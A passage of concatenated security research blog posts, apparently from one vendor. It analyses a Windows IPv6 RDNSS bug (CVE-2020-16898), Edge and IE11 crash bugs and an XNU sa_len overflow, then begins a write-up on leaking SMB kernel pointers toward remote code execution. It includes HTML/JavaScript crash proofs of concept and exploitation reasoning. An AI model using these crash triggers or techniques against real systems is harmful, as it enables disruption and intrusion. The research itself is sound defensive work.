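static bool rdnss_length_is_well_formed(uint8_t length)
{
    return length >= 3 && (length % 2) == 1;
}
```

A Length of 3 or 5 passes this check, while an even Length such as 4 does not: it leaves 8 bytes that belong to neither the header nor a complete address.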
As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:
As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-byte buffer. The two options have an even length of 4, which triggers the bug.
The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.
Here’s how the first iteration sees the packet:
Each option structure is just skipped according to the length field after doing some basic checks.
Here’s how the second iteration sees it:
This time, in the case of a Recursive DNS Server option, the length field is used to determine the number of IPv6 addresses, which is calculated as follows:
amount_of_addr = (length - 1) / 2
Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, in case of an even length value, happens to be in the middle of the option structure compared to what the first iteration sees. This results in processing an option structure which wasn’t validated in the first iteration.
Specifically in this POC, 34 is not a valid length for an option of type 24, but because it wasn’t validated, the processing continues and too many bytes are copied onto the stack, causing a stack overflow. Note that fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).
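The disagreement between the two iterations can be reproduced with a small user-mode model. The sketch below is only an illustration under our own assumptions: walk_options and demo_options are hypothetical names, the buffer is a made-up 40-byte option area rather than the POC packet, and the real driver works on NET_BUFFER structures, not flat arrays.

```c
#include <stddef.h>
#include <stdint.h>

enum { OPT_RDNSS = 25 };

/* One RDNSS option with an even Length of 4 (32 bytes), whose last 8 bytes
 * look like a header of their own (type 3, Length 1), followed by a
 * regular 8-byte option (type 5, Length 1). */
static const uint8_t demo_options[40] = {
    [0]  = OPT_RDNSS, [1]  = 4,
    [24] = 3,         [25] = 1,
    [32] = 5,         [33] = 1,
};

/* Records the offsets at which an option header is parsed and returns how
 * many were seen, or -1 on a malformed option or a full output array.
 * second_pass == 0: skip every option by its Length field.
 * second_pass != 0: for RDNSS, advance by the header plus the addresses only. */
static int walk_options(const uint8_t *buf, size_t size, int second_pass,
                        size_t *offsets, int max_offsets)
{
    size_t off = 0;
    int n = 0;

    while (size - off >= 2) {
        uint8_t type = buf[off];
        size_t len_bytes = (size_t)buf[off + 1] * 8;

        if (len_bytes == 0 || len_bytes > size - off || n == max_offsets)
            return -1;
        offsets[n++] = off;

        if (second_pass && type == OPT_RDNSS) {
            size_t addr_count = (size_t)(buf[off + 1] - 1) / 2;
            off += 8 + 16 * addr_count;   /* 24 bytes when Length is 4 */
        } else {
            off += len_bytes;             /* 32 bytes when Length is 4 */
        }
    }
    return n;
}
```

On demo_options, the first pass parses headers at offsets 0 and 32, while the second pass parses headers at offsets 0, 24 and 32. The header at offset 24 is the one that was never validated.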
Zooming out
Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them?
We didn’t find answers to these questions in any writeup, so we checked it ourselves.
Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:
void Ipv6pHandleRouterAdvertisement(...)
{
// Initialization and other code...
if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
// error
// Initialization and other code...
NET_BUFFER NetBuffer = /* ... */;
// First loop
while (NetBuffer->DataLength >= 2)
{
BYTE TempTypeLen[2];
BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
// error
BYTE OptionType = TempTypeLenPtr[0];
switch (OptionType)
{
case 1: // Source Link-layer Address
// ...
break;
case 3: // Prefix Information
if (OptionLenInBytes != 0x20)
// error
BYTE TempPrefixInfo[0x20];
BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
if (PrefixInfoPrefixLength > 128)
// error
break;
case 5: // MTU
// ...
break;
case 24: // Route Information Option
if (OptionLenInBytes > 0x18)
// error
BYTE TempRouteInfo[0x18];
BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
if (RouteInfoPrefixLength > 128 ||
(RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
(RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
// error
break;
case 25: // Recursive DNS Server Option
if (OptionLenInBytes < 0x18)
// error
// Added after the patch - this is the fix
//if ((OptionLenInBytes - 8) % 16 != 0)
// // error
break;
case 31: // DNS Search List Option
if (OptionLenInBytes < 0x10)
// error
break;
}
NetBuffer->DataOffset += OptionLenInBytes;
NetBuffer->DataLength -= OptionLenInBytes;
// Other adjustments for NetBuffer...
}
// Rewind NetBuffer and do other stuff...
// Second loop...
while (NetBuffer->DataLength >= 2)
{
BYTE TempTypeLen[2];
BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
// error
BOOL AdvanceBuffer = TRUE;
BYTE OptionType = TempTypeLenPtr[0];
switch (OptionType)
{
case 3: // Prefix Information
BYTE TempPrefixInfo[0x20];
BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
// Lots of code. Assumptions:
// PrefixInfoPrefixLength <= 128
break;
case 24: // Route Information Option
BYTE TempRouteInfo[0x18];
BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
// Some code. Assumptions:
// RouteInfoPrefixLength <= 128
// Other, less interesting assumptions about RouteInfoPrefixLength
break;
case 25: // Recursive DNS Server Option
Ipv6pUpdateRDNSS(..., NetBuffer, ...);
AdvanceBuffer = FALSE;
break;
case 31: // DNS Search List Option
Ipv6pUpdateDNSSL(..., NetBuffer, ...);
AdvanceBuffer = FALSE;
break;
}
if (AdvanceBuffer)
{
NetBuffer->DataOffset += OptionLenInBytes;
NetBuffer->DataLength -= OptionLenInBytes;
// Other adjustments for NetBuffer...
}
}
// More code...
}
As can be seen from the code, only 6 option types are supported in the first loop; the others are ignored. In any case, each header is skipped precisely according to the Length field.
Even fewer options, 4, are supported in the second loop. Similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 25 (Recursive DNS Server Option) and 31 (DNS Search List Option) are handled by functions that adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies.
That’s exactly what is happening with this bug – the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.
Breaking assumptions
Essentially, this bug allows us to break the assumptions made by the second loop that are supposed to be verified in the first loop. The only option types that are relevant are the 4 types which appear in both loops, which is also why we elided the handling of the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.
Option type 3 – Prefix Information
The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overwritten later anyway, so causing such out-of-bounds writes has no practical value.
For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
Option type 24 – Route Information Option
The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
The Prefix Length field value must be at most 128. Same implications as for option type 3.
The Prefix Length field value must fit the option structure size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
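The three assumptions for option type 24 can be collected into a single predicate. This is a sketch that simply restates the first-loop checks from the simplified listing above as a standalone C function; the name route_info_option_ok is ours and does not exist in tcpip.sys.

```c
#include <stdbool.h>
#include <stdint.h>

/* Mirrors the first-loop checks for the Route Information Option:
 * - the option is at most 0x18 bytes long,
 * - the prefix length is at most 128 bits,
 * - a prefix longer than 64 bits needs the full 0x18-byte option,
 * - a non-empty prefix needs at least a 0x10-byte option. */
static bool route_info_option_ok(uint16_t option_len_bytes, uint8_t prefix_len)
{
    if (option_len_bytes > 0x18)
        return false;
    if (prefix_len > 128)
        return false;
    if (prefix_len > 64 && option_len_bytes < 0x18)
        return false;
    if (prefix_len > 0 && option_len_bytes < 0x10)
        return false;
    return true;
}
```

An option that reaches the second loop without passing through this kind of check can carry, for example, a prefix length of 129 or a size larger than 0x18 bytes.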
Option type 25 – Recursive DNS Server Option
The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8 bytes is not valid according to the specification.
The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
Option type 31 – DNS Search List Option
The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.
As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.
Revisiting the Stack Overflow
Before giving up, we took a closer look at the stack. The POCs that we’ve seen overwrite the stack such that the stack cookie (the __security_cookie value) is overwritten, causing a system crash before the function returns.
We checked whether overwriting anything on the stack can help achieve code execution before the function returns. That can be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.
Summary
We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we missed something, so any insights or feedback are welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.
During yet another Digital Forensics investigation using ZecOps Crash Forensics Platform, we saw a crash of the Legacy (pre-Chromium) Edge browser. The crash was caused by a NULL pointer dereference bug, and we concluded that the root cause was a benign bug of the browser. Nevertheless, we thought that it would be a nice showcase of a crash reproduction.
Amusingly, the browser crashed in the CMediaElement::IsSafeToUse function. Apparently, the answer is no – it isn’t safe to use.
Crash reproduction
The stack trace indicates that the function that was executed by the JavaScript code, and eventually caused the crash, was removeSourceBuffer, part of the MediaSource Web API. Looking for a convenient example to play with, we stumbled upon this page which uses the counterpart function, addSourceBuffer. We added a button that calls removeSourceBuffer and tried it out.
Just calling removeSourceBuffer didn’t cause a crash (otherwise it would be too easy, right?). To see how far we got, we attached a debugger and put a breakpoint on the edgehtml!CMediaSourceExtension::Var_removeSourceBuffer function, then did some stepping. We saw that the CSourceBuffer::RemoveAllTracksHelper function is not being called at all. What tracks does it help to remove?
After some searching, we learned that there’s the HTML <track> element that allows us to specify textual data, such as subtitles, for a media element. We added such an element to our sample video and bingo! Edge crashed just as we hoped.
Crash reason
Our best guess is that the crash happens because the CTextTrackList::GetTrackCount function returns an incorrect value. In our case, it returns 2 instead of 1. An iteration is then made, and the CTextTrackList::GetTrackNoRef function is called with index values from 0 to the track count (simplified):
int count = CTextTrackList::GetTrackCount();
for (int i = 0; i < count; i++) {
CTextTrackList::GetTrackNoRef(..., i);
/* more code... */
}
While it may look like an out-of-bounds bug, it isn’t. GetTrackNoRef returns an error for an invalid index, and for index=1 (in our case), a valid object is returned; it’s just that one of its fields is a NULL pointer. Perhaps the last value in the array is some kind of a sentinel value which was not supposed to be part of the iteration.
Exploitation
The bug is not exploitable, and can only cause a slight inconvenience by crashing the browser tab.
POC
Here’s a POC that demonstrates the crash. Save it as an HTML file, and place the test.mp4 and foo.vtt files in the same folder.
Tested version:
Microsoft Edge 44.18362.449.0
Microsoft EdgeHTML 18.18363
<button>Crash</button>
<br><br><br>
<video autoplay controls playsinline>
<!-- https://gist.github.com/Michael-ZecOps/046e2c97d208a0a6da2f81c3812f7d5d -->
<track label="English" kind="subtitles" srclang="en" src="foo.vtt" default>
</video>
<script>
// Based on: https://simpl.info/mse/
var FILE = 'test.mp4'; // https://w3c-test.org/media-source/mp4/test.mp4
var video = document.querySelector('video');
var mediaSource = new MediaSource();
video.src = window.URL.createObjectURL(mediaSource);
mediaSource.addEventListener('sourceopen', function () {
var sourceBuffer = mediaSource.addSourceBuffer('video/mp4; codecs="mp4a.40.2,avc1.4d400d"');
var button = document.querySelector('button');
button.onclick = () => mediaSource.removeSourceBuffer(mediaSource.sourceBuffers[0]);
get(FILE, function (uInt8Array) {
var file = new Blob([uInt8Array], {
type: 'video/mp4'
});
var reader = new FileReader();
reader.onload = function (e) {
sourceBuffer.appendBuffer(new Uint8Array(e.target.result));
sourceBuffer.addEventListener('updateend', function () {
if (!sourceBuffer.updating && mediaSource.readyState === 'open') {
mediaSource.endOfStream();
}
});
};
reader.readAsArrayBuffer(file);
});
}, false);
function get(url, callback) {
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'arraybuffer';
xhr.send();
xhr.onload = function () {
if (xhr.status !== 200) {
alert('Unexpected status code ' + xhr.status + ' for ' + url);
return false;
}
callback(new Uint8Array(xhr.response));
};
}
</script>
Does mobile DFIR research interest you?
ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected].
During a DFIR investigation using ZecOps Crash Forensics on a developer’s computer, we encountered a consistent crash in Internet Explorer 11. The TL;DR is that although this bug is not exploitable, it presents an interesting expansion of the attack surface through the Developer Consoles in browsers.
While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.
Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.
Reproduction
We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.
We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.
Summary
Tools such as Developer Options dynamically add additional complexity to the process and may open up additional attack surfaces.
Exploitation
Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to the MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.
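The effect described above can be illustrated with a toy model in C. Everything here is hypothetical: the struct names, protected_free and dispatch are ours, and the model only captures the "zeroed but still mapped" behavior stated in the text, not how MemGC or mshtml are actually implemented.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

struct sink     { int id; };
struct consumer { struct sink *sink; };
struct helper   { struct consumer *consumer; };

/* Toy stand-in for a protected free: the block is wiped, but it stays
 * mapped for as long as something still references it. */
static void protected_free(void *block, size_t size)
{
    memset(block, 0, size);
}

/* Follows the same three-step pointer chain as the crashing code path.
 * Returns false where the real code would fault on a NULL pointer. */
static bool dispatch(const struct helper *h, int *id_out)
{
    const struct consumer *c = h->consumer; /* 1st dereference: stale but mapped block */
    const struct sink *s = c->sink;         /* 2nd dereference: NULL after the wipe */
    if (s == NULL)
        return false;                       /* the 3rd dereference would crash here */
    *id_out = s->id;
    return true;
}
```

Because the stale block only ever yields zeroes, an attacker has no opportunity to place controlled data behind the dangling pointer, which is why the crash stays a NULL dereference.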
Responsible Disclosure
We reported this issue to Microsoft, which decided not to fix it.
POC
Below is a small HTML page that demonstrates the concept and leads to a crash. Tested IE11 version: 11.592.18362.0 Update Versions: 11.0.170 (KB4534251)
<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>
Interested in researching browser & OS bugs daily?
ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected]
ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.
We see it in the news every day: sophisticated threat actors can bypass all existing security defenses. Attackers do make mistakes, however, and these mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology utilizes machine learning for insights, correlation and identifying anomalous behavior for 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of if, when, and how a mobile device has been compromised.
World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.
Supported versions:
Android 8 and above – until latest
iOS 10 and above – until latest
Supported HW Models:
All device models are supported on both Android and iOS.
ZecOps provides the most thorough operating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.
In the past few years, XNU had a few vulnerabilities in newly added or changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silent patched uaf), so it is no surprise that the combination of newly added code and a complex area (content filter), along with a funny comment, caught our attention.
0x1- Discovery story
Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:
/*
* TO DO LIST
*
* SOONER:
*
* Deal with OOB
*
* LATER:
*
* If support datagram, enqueue control and address mbufs as well
*/
Is this comment referring to OOB read/write issues? Probably not, but it won’t hurt to run a quick search for those. Using the magic tool Cmd+F to search for memcpy calls, in less than two minutes you will find the following.
0x2- The bug.
The newly updated cfil_sock_attach function is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:
errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
errno_t error = 0;
uint32_t filter_control_unit;
socket_lock_assert_owned(so);
/* Limit ourselves to TCP that are not MPTCP subflows */
if ((so->so_proto->pr_domain->dom_family != PF_INET &&
so->so_proto->pr_domain->dom_family != PF_INET6) ||
so->so_proto->pr_type != SOCK_STREAM ||
so->so_proto->pr_protocol != IPPROTO_TCP ||
(so->so_flags & SOF_MP_SUBFLOW) != 0 ||
(so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
goto done;
}
filter_control_unit = necp_socket_get_content_filter_control_unit(so);
if (filter_control_unit == 0) {
goto done;
}
if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
goto done;
}
if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
goto done;
}
if (cfil_active_count == 0) {
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
goto done;
}
if (so->so_cfil != NULL) {
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
CFIL_LOG(LOG_ERR, "already attached");
} else {
cfil_info_alloc(so, NULL);
if (so->so_cfil == NULL) {
error = ENOMEM;
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
goto done;
}
so->so_cfil->cfi_dir = dir;
}
if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
filter_control_unit);
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
goto done;
}
CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
(uint64_t)VM_KERNEL_ADDRPERM(so),
filter_control_unit, so->so_cfil->cfi_sock_id);
so->so_flags |= SOF_CONTENT_FILTER;
OSIncrementAtomic(&cfil_stats.cfs_sock_attached);
/* Hold a reference on the socket */
so->so_usecount++;
/*
* Save passed addresses for attach event msg (in case resend
* is needed.
*/
if (remote != NULL) {
memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
}
if (local != NULL) {
memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
}
error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
/* We can recover from flow control or out of memory errors */
if (error == ENOBUFS || error == ENOMEM) {
error = 0;
} else if (error != 0) {
goto done;
}
CFIL_INFO_VERIFY(so->so_cfil);
done:
return error;
}
We can see that in (Part A) the function receives two sockaddr parameters (local and remote), which are user controlled, and then uses their sa_len struct member (remote in (Part B) and local in (Part C)) to copy data to cfi_so_attach_faddr and cfi_so_attach_laddr. Parts (A), (B) and (C) were all the result of new changes in XNU.
So what’s the problem? The problem is that sa_len is never checked. It can be set to any value up to 255 and is then used in a memcpy to copy data into a union sockaddr_in_4_6, which is only 28 bytes long, resulting in a buffer overflow.
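For comparison, here is a minimal sketch of what a length-checked copy could look like. It is not the actual XNU patch: toy_sockaddr and save_attach_addr are hypothetical stand-ins written for this example, and only the 28-byte destination size and the one-byte sa_len field come from the description above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { ATTACH_ADDR_SIZE = 28 };   /* size of union sockaddr_in_4_6, per the text */

/* Hypothetical stand-in for a BSD-style sockaddr: the first byte is the
 * length the caller claims, and the whole object is 255 bytes so that any
 * claimed length can be read from it safely in this model. */
struct toy_sockaddr {
    uint8_t sa_len;
    uint8_t sa_family;
    uint8_t sa_data[253];
};

/* Copies the address only if the claimed length fits the destination.
 * Returns 0 on success and -1 if sa_len is too large. */
static int save_attach_addr(uint8_t dst[ATTACH_ADDR_SIZE],
                            const struct toy_sockaddr *src)
{
    if (src->sa_len > ATTACH_ADDR_SIZE)
        return -1;
    memcpy(dst, src, src->sa_len);
    return 0;
}
```

With sa_len set to 16 the copy succeeds, while a sa_len of 255 is rejected before memcpy is reached. In the vulnerable code, that same value would write 227 bytes past the end of the 28-byte union.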
The PoC below is almost identical to Ian Beer’s mptcp PoC, with two changes. It has a prerequisite for reaching the vulnerable area: in order to trigger the vulnerability we need to use an MDM-enrolled device with an NECP policy, or attach the socket to a valid filter_control_unit. One way to do that is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.
Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):
Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):
The panic call with the memcpy_chk is gone alongside the patch!
Did the original developer know this function was vulnerable and place it there as a placeholder until a proper patch? Your guess is as good as ours.
Also note that the call to memcpy_chk before real_mode_bootstrap_end (which is a wrapper around memcpy) is what kept this issue from being exploitable.
0x4- What can we take from this?
Read comments; they might give us valuable information
Newly added code is oftentimes buggy
Content filter code is complex and tricky
Now, with Pangu’s recent blog post and Ian Beer’s mptcp bug, we can learn that sockaddr->sa_len has already caused multiple issues and should be audited a bit more carefully.
0x5- Attacks in the wild?
This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threat intelligence database, and saw no active attacks associated with this issue. We still advise updating to the latest version to receive all other updates.
In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has fewer limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.
The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try to read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us groom the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.
SrvNetAllocateBuffer and the allocated buffer layout
As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:
While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.
Hunting for pointers
Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:
#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/ LIST_ENTRY ConnectionBufferList; // (orange)
/*10*/ WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/ WORD LookasideListIndex; // 0 to 8
/*14*/ WORD LookasideListLogicalProcessor;
/*16*/ WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/ PBYTE UserBufferPtr; // (blue)
/*20*/ DWORD UserBufferSizeAllocated;
/*24*/ DWORD UserBufferSizeUsed;
/*28*/ DWORD PoolAllocationSize;
/*2C*/ BYTE unknown1[4];
/*30*/ PBYTE PoolAllocationPtr; // (blue)
/*38*/ PMDL pMdl1; // (blue)
/*40*/ DWORD BytesProcessed;
/*44*/ BYTE unknown2[4];
/*48*/ SIZE_T BytesReceived;
/*50*/ PMDL pMdl2; // (blue)
/*58*/ PVOID pSrvNetWskStruct; // (orange)
/*60*/ DWORD SmbFlags;
/*64*/ PVOID TracingPtr1; // (orange)
/*6C*/ SIZE_T TracingUnknown1;
/*74*/ PVOID TracingPtr2; // (orange)
/*7C*/ SIZE_T TracingUnknown2;
/*7C*/ SIZE_T TracingUnknown2;
/*84*/ BYTE unknown3[12];
};
#pragma pack(pop)
The colored variables are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:
ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.
As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.
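As a rough illustration of how the leaked header bytes could be decoded on the attacker's side, here is a minimal Python sketch that unpacks the 0x90-byte SRVNET_BUFFER_HDR layout listed above. The field names follow the struct listing; the helper name `parse_srvnet_buffer_hdr` and the sample addresses are ours and purely hypothetical.

```python
import struct
from collections import namedtuple

# "<" means little-endian with no padding, mirroring #pragma pack(push, 1).
SRVNET_BUFFER_HDR_FMT = "<QQHHHHQIII4sQQI4sQQQIQQQQ12s"

SrvNetBufferHdr = namedtuple("SrvNetBufferHdr", [
    "Flink", "Blink",                      # ConnectionBufferList (orange)
    "BufferFlags", "LookasideListIndex",
    "LookasideListLogicalProcessor", "TracingDataCount",
    "UserBufferPtr",                       # blue
    "UserBufferSizeAllocated", "UserBufferSizeUsed", "PoolAllocationSize",
    "unknown1",
    "PoolAllocationPtr", "pMdl1",          # blue
    "BytesProcessed", "unknown2", "BytesReceived",
    "pMdl2",                               # blue
    "pSrvNetWskStruct",                    # orange
    "SmbFlags",
    "TracingPtr1", "TracingUnknown1", "TracingPtr2", "TracingUnknown2",
    "unknown3",
])


def parse_srvnet_buffer_hdr(raw):
    """Decode the first 0x90 bytes of `raw` as a SRVNET_BUFFER_HDR (hypothetical helper)."""
    size = struct.calcsize(SRVNET_BUFFER_HDR_FMT)
    return SrvNetBufferHdr._make(struct.unpack(SRVNET_BUFFER_HDR_FMT, raw[:size]))


if __name__ == "__main__":
    # Synthetic header with made-up addresses, only to exercise the parser.
    sample = struct.pack(
        SRVNET_BUFFER_HDR_FMT,
        0xFFFF8A0011112220, 0xFFFF8A0011112220,   # Flink, Blink -> list head
        0x0003, 2, 0, 0,
        0xFFFF8A0022220050,
        0x1100, 0, 0x1278, b"\0" * 4,
        0xFFFF8A0022220000, 0xFFFF8A0022221200,
        0, b"\0" * 4, 0,
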